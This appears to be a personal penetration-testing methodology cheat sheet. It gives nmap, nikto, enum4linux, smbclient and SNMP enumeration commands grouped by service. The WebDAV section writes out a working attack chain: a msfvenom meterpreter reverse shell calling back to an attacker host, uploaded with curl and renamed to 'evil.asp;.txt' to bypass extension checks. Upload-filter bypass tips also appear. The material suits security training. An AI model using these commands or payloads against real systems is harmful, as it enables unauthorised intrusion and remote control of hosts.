Skip to content

Pentest Methodology

Port and Vulnerability Scanning

These are the nmap commands I usually use. I use an intensive all port TCP nmap scan in order to find everything. I also use a UDP scan. UDP is really slow so I only search the top ports. I also sometimes use a nmap scan loaded with vulnerability finding scripts but it can create some problems if the target is running any weak services.

# Nmap Depth Scan
nmap -vv -Pn -A -sC -sS <IP ADDRESS> -p-

# Nmap Vuln Scan
#  Use this nmap scan with caution. It can possibly take down weak services.
nmap -Pn --script *vuln* --script-args=unsafe=1 <IP ADDRESS> -p <PORTS>

# Nmap U Scan
nmap -vv -Pn -A -sC -sU -T4 <IP ADDRESS> --top-ports

Enumerating

Always check everything very closely and go through each port one by one. Sometimes ports are tricky, expecially HTTP ports. One way to check a port that you're unsure about is to use curl. Curl is normally used for HTTP, however it can be used on any port to see what protocol the ports asks for. It's particularly helpful in finding those odd HTTP ports really quick.

Search everything that you encounter. Programs and their version numbers. Use either searchsploit or site:exploit-db.com/exploits/ 

curl <IP ADDRESS>:<PORT>

Another important thing to do is to take advantage of nmap NSE scripts. If you feel like your target is vulnerable to something try checking to see if there's a NMAP script for that.

#Finding nmap scripts
locate *.nse

FTP - 21

First step when finding a FTP server is to see if there's anonymous login. If there is anonymous login what can you do with it?

  • Does the FTP server have a wwwroot directory? Is it possible to upload into this directory?

  • Does the FTP server have arbitrary file access? What information can you find?

    • What is the OS version?
    • What information can you find about other services?
    • Can you find any passwords?
# The following are file locations that display OS information
# Windows XP
C:\Windows\System32\eula.txt

# Windows 7
C:\Windows\System32\license.rtf

# Linux
cat /etc/lsb-release
cat /etc/issue.net

# Debian
cat /etc/debian_version

# Red Hat
cat /etc/redhat-release

Nmap has a number of NSE scripts that may be helpful for enumerating FTP.

nmap -vv -Pn --script ftp* <IP ADDRESS> -p 21

HTTP - 80, 8000, 8080

Make sure to nikto scan every single HTTP port that nmap finds. Ports 80, 8000, and 8080 are well known HTTP ports but HTTP can also pop on other not so common ports. The curl trick mentioned above works well in these situations.

#Basic nikto scan
nikto -h <IP ADDRESS> or nikto -h <IP ADDRESS>:<PORT>

#Scan all CGI directories
nikto -C all -h <IP ADDRESS> or nikto -C all -h <IP ADDRESS>:<PORT>

After using Nikto be sure to check all the info carefully. DON'T JUST RELY ON NIKTO. Take the manual approach, this includes checking the source of webpages for possible information.

  • Does the source mention anything about a program? Does the source contain any version numbers?
  • What language is the server running? PHP? ASP? Etc.
    • This is important for uploading or knowing vulnerabilities
      • For example. Let's say you found a host running FTP and HTTP servers. You also discover that you can upload through FTP and access the file through HTTP. Well to execute that file it has to be readable by the server.
  • What filetypes does the server allow for uploading?
    • Perhaps, you can take advantage of this by generating a payload with a specific format.
msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

If you come accross a login page try using basic default credentials. If nothing then go to google and lookup the default credentials for the application and version.

If you come accross a web application admin console, try to exploit it.

  • Does the web application allow uploading?
    • It allows uploading but it won't accept my file type?
      • Try checking to see if it uploads it anywayy but in a Temp folder?
      • Is there a way to bypass the file check?
      • Try seeing if you can upload a malicious file that it can accept?
      • I uploaded my file but I don't know how to access it?
        • Did you try seeing if you could traverse directories?
        • Perhaps you can try using an LFI to visit the file
  • Does the website use WEBDAV?
    • Can you upload into it?
    • Try Cadaver?

First check how WEBDAV works with the server version. It might require a certain trick for uploading to work. For example, you generate a msfvenom reverse shell in asp format called evil.txt. After uploading with curl -T evil.txt http://<IP ADDRESS>/ you then use cadaver http://<IP ADDRESS>/ in order to rename the file from evil.txt to evil.asp;.txt. This takes advantage of the servers vulnerability. The full process:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f asp > evil.txt
curl -T evil.txt http://<IP ADDRESS>/
cadaver http://<IP ADDRESS>/
dav:/> copy evil.txt evil.asp;.txt

Then you execute by visiting the file.

SMB - 139, 445

SMB can release a ton of information if used correctly. The first step when finding a host is to run enum4linux. Enum4linux can find information such as OS version as well as any open shares.

enum4linux -a <IP ADDRESS>

If a share is found you can view it with smbclient. Navigating through SMB shares is similar to FTP. They can also share similar vulnerabilities such as arbitrary file access. 

#To list shares
smbclient -L <IP ADDRESS>

#To access shares
smbclient '//<IP ADDRESS>/<SHARE NAME>'

Sometimes it's best to mount shares for easy viewing. A nice trick for fast mounting is using gedit.

#It's weird, yes. But it's fast and works
gedit smb://<IP ADDRESS>/

After mounting it's then possible to view everything easily and even in a GUI for easier sorting.

SNMP - UDP 161

Once you have found a windows share. You can also enumerate SNMP with onesixtyone and snmp-check.

#Reveals OS Version
onesixtyone <IP ADDRESS>

#Reveals everything about a server, OS Version, Users, Processes, Hotfixes, etc.
snmp-check <IP ADDRESS>

Email - 25, 110/995 or 143/993

These can be good sources for finding users or passwords. Don't neglect these ports.

SSH - 22

It's uncommon to find a vulnerability for SSH however there are a few. One common example is the Debian brute force one.

TFTP - UDP 69

Treat this as you would FTP.